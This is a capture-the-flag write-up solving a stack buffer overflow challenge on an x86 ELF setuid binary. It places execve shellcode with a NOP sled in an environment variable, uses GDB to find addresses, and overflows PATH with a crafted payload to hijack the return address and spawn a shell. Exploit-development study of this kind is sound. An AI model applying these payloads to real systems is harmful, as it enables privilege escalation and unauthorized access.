# 9. ELF x86 - Stack buffer overflow basic 4

This problem is very similar to the last one. We need to simply put our shellcode in one of the environment variables, and then overflow the last environment variable with the address of it to overwrite our return address, although there is one tricky issue which we will get to later. Firstly, let's write our shellcode. In this particular case, it's difficult to predict exactly where our environment variable will be placed, so we should write a bunch of `nop` operations in front of our code which make it easier to jump to our code, as if we jump anywhere within the `nop` section it'll continue forward until the actual code. The shellcode I used was from [here](http://shell-storm.org/shellcode/files/shellcode-811.php) as the previous 23-byte shellcode didn't work for some reason. We can do it easily from bash like so, which will fit perfectly into our 128-byte buffer: ``export USERNAME=`python -c 'print("\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80")'` ``. Now that we have our shellcode in our environment, let's find out where it's located so that we can overwrite the return pointer to it. Open the program in GDB, set a breakpoint at line 44(just before the return), and get the location of username like so: `x/x env.username`. In my case it was `0xbffff4fc` but I set my pointer to `0xbffff53c` to give it a bit of headroom on either side so if the values are off slilghtly it should still work. However, there are two more things we need to find out first. In this case we will use PATH for our buffer overflow as it's at the bottom of the struct. We firstly need to find out the offset between path and our return pointer. With the program open in GDB and stopped at line 44 again, get the address of PATH: `x/x env.path`, and the address of our return pointer: `x/x $esp+4`. If you subtract them, you should find that they are 160 bytes apart from each other. Finally, the tricky thing I mentioned earlier. As the function returns a struct, and the struct is initially allocated on the stack, when it returns it copies the struct into a global variable. The pointer telling it where to copy the struct to is located directly after the return pointer. Hence, if we strcpy up to the return pointer, we will overwrite the pointer will the null byte that strcpy adds to the end. The solution is to check what it's original value is, and to rewrite it with that value so that the null byte doesn't get written over it. You can do that by running `x/42xw env/path`. This will allow us to confirm that the return address is indeed stored at env.path+164(it should be the second last address), and we can also get the value of the new struct location(the last address). In my case, it was `0xbffff750`. Finally, we need to write the overflow exploit to the path environment variable. Firstly, get the length of the variable with `echo ${#PATH}`. Pad it to the nearest 4(I used colons for the padding but it doesn't matter much), and then write the address with the bytes reversed(we are using little-endian) enough times to get our total length to 164. Then add the new struct address onto the end(remember to reverse the bytes again), so that the total length is now 168. This can all be done in one command like so: ``export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/opt/tools/checksec/:::`python -c 'print("\x3c\xf5\xff\xbf"*13+"\x50\xf7\xff\xbf")'` ``. At this point, you should be able to run the program and get a shell as the setuid user. You can then get the password by running `cat .passwd`.
